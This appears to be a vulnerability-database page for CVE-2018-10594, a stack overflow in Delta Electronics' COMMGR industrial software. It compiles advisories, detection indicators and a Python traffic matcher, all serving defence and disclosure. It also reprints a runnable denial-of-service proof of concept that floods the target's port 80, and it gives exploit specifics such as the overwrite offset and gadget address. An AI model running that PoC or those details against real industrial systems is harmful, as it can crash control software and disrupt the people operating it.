CVE-2018-10594
Published 2018-06-26
Priority P179 · critical · 9.8 (CVSS 3.0)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: public (Metasploit module and PoC indexed below)
EPSS 68.96% (99.3rd percentile)
Delta Industrial Automation COMMGR from Delta Electronics versions 1.08 and prior with accompanying PLC Simulators (DVPSimulator EH2, EH3, ES2, SE, SS2 and AHSIM_5x0, AHSIM_5x1) utilize a fixed-length stack buffer where an unverified length value can be read from the network packets via a specific network port, causing the buffer to be overwritten. This may allow remote code execution, cause the application to crash, or result in a denial-of-service condition in the application server.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| deltaww | commgr | <= 1.08 | — |
Detection & IOCs (extracted from sources)
Indicator bytes: \xeb\x27\x90\x90
- Monitor for large (>4164 byte) TCP payloads sent to port 502 targeting COMMGR.exe; the Metasploit exploit uses an offset of 4164 bytes before the return address overwrite.
- Detect the pop/pop/ret (p/p/r) gadget return address 0x00401e14 from COMMGR.exe appearing in network payloads sent to port 502 (on the wire, little-endian: 14 1e 40 00).
- Detect the short-jump NOP sled byte sequence \xeb\x27\x90\x90 in TCP payloads on port 502, indicative of the Metasploit exploit module for this CVE.
- The PoC DoS exploit connects repeatedly to port 80 and sends 4412 bytes of 0x41 followed by 1000 bytes of 0x42 and a CRLF on each connection, keeping the connections open; high-rate connection attempts carrying this pattern to port 80 on COMMGR hosts should be alerted on.
- Null byte (\x00) is the only bad character for the payload; shellcode in exploit traffic on port 502 will not contain null bytes, which can help distinguish exploit attempts from benign traffic.
- The Metasploit module targets only COMMGR 1.08 on Windows XP SP3, Windows 7 SP1, and Windows 8.1; the return address and offset are specific to this version/platform combination and will not apply to other versions.
- The payload space is constrained to 640 bytes with NOP insertion disabled; detection rules should account for shellcode immediately following a 40-byte NOP sled.
- The vulnerability is exploitable via a specific network port; both ports 502 and 10002 are referenced as the relevant communication ports for COMMGR and should both be monitored/restricted.
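The bullets above are the raw material for a detection rule; the matcher below is an added example written for this page, not code from Delta, CISA, Exploit-DB or the Metasploit module. The constants are exactly the values the IOC list gives; the function names, the per-source connection tracker for the PoC, and the sample frames are assumptions for the demo, and the crafted buffer only places the indicators at plausible positions so the matcher has something to hit (it is not the Metasploit module's real packet layout).

```python
"""Indicator matcher for CVE-2018-10594 exploit traffic aimed at COMMGR hosts.

Added example for this page (not code from any source listed here). Constants
come from the IOC bullets; everything else is assumed for the demonstration.
"""
import struct
from collections import defaultdict, deque
from dataclasses import dataclass, field
from typing import Deque, Dict, List

# --- indicator constants, as given in the IOC list ---------------------------
OFFSET_TO_RET = 4164                              # filler bytes before the return address overwrite
PPR_RET_ADDR = 0x00401E14                         # pop/pop/ret gadget in COMMGR.exe
PPR_RET_BYTES = struct.pack("<I", PPR_RET_ADDR)   # little-endian on the wire: 14 1e 40 00
SHORT_JMP_SLED = b"\xeb\x27\x90\x90"              # jmp short +0x27 followed by NOPs
POC_DOS_BUFFER = b"\x41" * 4412 + b"\x42" * 1000  # body sent by the Exploit-DB PoC
COMMGR_PORTS = {502, 10002}                       # ports the IOCs name for COMMGR
POC_PORT = 80                                     # port the DoS PoC connects to


@dataclass
class Verdict:
    suspicious: bool
    reasons: List[str] = field(default_factory=list)


def inspect_payload(dst_port: int, payload: bytes) -> Verdict:
    """Score one TCP payload (already reassembled) against the indicators."""
    reasons: List[str] = []
    if dst_port in COMMGR_PORTS:
        if len(payload) > OFFSET_TO_RET:
            reasons.append(f"{len(payload)}-byte payload to port {dst_port} exceeds "
                           f"the {OFFSET_TO_RET}-byte overwrite offset")
        at = payload.find(PPR_RET_BYTES)
        if at != -1:
            reasons.append(f"p/p/r gadget address {PPR_RET_ADDR:#010x} at offset {at}")
        at = payload.find(SHORT_JMP_SLED)
        if at != -1:
            reasons.append(f"short-jump NOP sled {SHORT_JMP_SLED.hex()} at offset {at}")
    elif dst_port == POC_PORT and payload.startswith(POC_DOS_BUFFER):
        reasons.append("PoC DoS buffer (4412 x 0x41 + 1000 x 0x42) sent to port 80")
    return Verdict(bool(reasons), reasons)


class PocConnectionTracker:
    """Sliding-window counter for the PoC's repeated port-80 connections from one source.

    Assumed helper: the IOC only says 'high-rate connection attempts ... should be
    alerted on', so threshold and window are tunables, not values from the page.
    """

    def __init__(self, threshold: int = 10, window_seconds: float = 5.0) -> None:
        self.threshold = threshold
        self.window = window_seconds
        self._seen: Dict[str, Deque[float]] = defaultdict(deque)

    def record(self, src_ip: str, dst_port: int, payload: bytes, now: float) -> bool:
        """Return True once src_ip has sent the PoC pattern to port 80 `threshold`
        times within the window. `now` is passed in so the logic is deterministic."""
        if dst_port != POC_PORT or not inspect_payload(dst_port, payload).suspicious:
            return False
        hits = self._seen[src_ip]
        hits.append(now)
        while hits and now - hits[0] > self.window:   # drop hits outside the window
            hits.popleft()
        return len(hits) >= self.threshold


# --- constructed sample traffic (not captures) --------------------------------
# Benign Modbus/TCP "read holding registers" request, 12 bytes, as seen on port 502.
BENIGN_MODBUS = bytes.fromhex("00010000000601030000000a")
# Buffer carrying every indicator from the IOC list; the layout is assumed for the
# demo and is not the Metasploit module's actual packet.
CRAFTED_COMMGR = (b"A" * OFFSET_TO_RET + SHORT_JMP_SLED + PPR_RET_BYTES
                  + b"\x90" * 40 + b"\xcc" * 100)


def demo() -> Dict[str, Verdict]:
    """Run the matcher over the constructed samples and return the verdicts."""
    return {
        "benign_modbus": inspect_payload(502, BENIGN_MODBUS),
        "crafted_commgr": inspect_payload(502, CRAFTED_COMMGR),
        "poc_dos": inspect_payload(80, POC_DOS_BUFFER + b"\r\n"),
        "plain_http": inspect_payload(80, b"GET / HTTP/1.1\r\nHost: commgr\r\n\r\n"),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, "SUSPICIOUS" if verdict.suspicious else "ok", *verdict.reasons, sep="\n  ")
```

The length rule is the one worth trusting on its own for port 502: a Modbus/TCP ADU is at most 260 bytes, so anything past 4164 bytes to that port is anomalous regardless of content. Baseline normal frame sizes on port 10002 before applying the same threshold there, and treat the gadget-address and `\xeb\x27\x90\x90` matches as confirmation of this specific module rather than of the vulnerability, since a different exploit against the same bug would carry neither.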
CVSS provenance
- NVD v3.0: 9.8 CRITICAL, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
CISA ICS
Delta Electronics Delta Industrial Automation COMMGR
cisa_ics · 2018-06-21 · CVSS 9.8
ICS Advisory: Delta Electronics Delta Industrial Automation COMMGR
Last Revised: June 21, 2018
Alert Code: ICSA-18-172-01
## 1. EXECUTIVE SUMMARY
- CVSS v3 7.3 (the advisory's own score; NVD rates the same issue 9.8)
- ATTENTION: Exploitable remotely/low skill level to exploit
- Vendor: Delta Electronics
- Equipment: Delta Industrial Automation COMMGR
- Vulnerability: Stack-based Buffer Overflow
## 2. RISK EVALUATION
Successful exploitation of this vulnerability may allow remote code execution, cause the application to crash, or cause a denial-of-service condition in the application server.
## 3. TECHNICAL DETAILS
## 3.1 AFFECTED PRODUCTS
The
GHSA
GHSA-55m9-57p9-8j6r (ghsa_unreviewed · 2022-05-13 · CVE-2018-10594 · CRITICAL · CWE-119): same description as the CVE entry above.
No detection rules found.
Exploit-DB
Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit)
exploitdb · 2018-10-09 · CVE-2018-10594
---
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# NOTE: the class header and the lines between it and the 'Name' key were lost in
# extraction; the standard Metasploit module skeleton is restored here. The
# excerpt is still truncated where the source was cut off.
class MetasploitModule < Msf::Exploit::Remote
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
      'Description' => %q{
        This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
        Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
        crafted packets. This module has been tested successfully on Delta Electronics Delta
        Industrial Automation COMMGR 1.08 over
        Windows XP SP3,
        Windows 7 SP1, and
        Windows 8.1.
      },
      'Author'      =>
        [
          'ZDI',         # Initial discovery
          't4rkd3vilz',  # PoC
          'hubertwslin'  # Metas
          # [excerpt truncated here in the source]
```
Exploit-DB
Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)
exploitdb · 2018-07-02 · CVSS 9.8 · CVE-2018-10594 [CRITICAL]
---
```python
# Exploit Title: Delta Electronics Delta Industrial Automation COMMGR - Remote STACK-BASED BUFFER OVERFLOW
# Date: 02.07.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.deltaww.com/
# Software Link: http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=2093&DocPath=1&hl=en-US
# Version:
#   COMMGR Version 1.08 and prior.
#   DVPSimulator EH2, EH3, ES2, SE, SS2
#   AHSIM_5x0, AHSIM_5x1
# Tested on: Kali Linux
# CVE : CVE-2018-10594
# Run exploit, result DOS
#
# Editorial notes: the Python 2 original is ported to Python 3; the "\X42" typo
# (which would have sent the literal four characters \X42 a thousand times) is
# corrected to "\x42" so the buffer is 4412 x 0x41 + 1000 x 0x42 as the PoC
# intends; the loop tail, cut off in the source at the counter increment, is
# completed with the increment and a socket-error exit.
import socket
import sys

ip = input("[+] IP to attack: ")
sarr = []          # keep every socket so the target holds all connections open
i = 0
while True:
    try:
        sarr.append(socket.create_connection((ip, 80)))
        print("[+] Connection %d" % i)
        crash1 = b"\x41" * 4412 + b"\x42" * 1000
        sarr[i].send(crash1 + b"\r\n")
        i += 1
    except socket.error as e:
        # target stopped accepting connections (or crashed): stop flooding
        print("[-] Connection %d failed: %s" % (i, e))
        sys.exit(0)
```
Metasploit
Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow
metasploit
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially crafted packets. This module has been tested successfully on Delta Electronics Delta Industrial Automation COMMGR 1.08 over Windows XP SP3, Windows 7 SP1, and Windows 8.1.
No writeups or analysis indexed.
References
- http://www.securityfocus.com/bid/104529
- https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01
- https://www.exploit-db.com/exploits/44965/
- https://www.exploit-db.com/exploits/45574/
Published 2018-06-26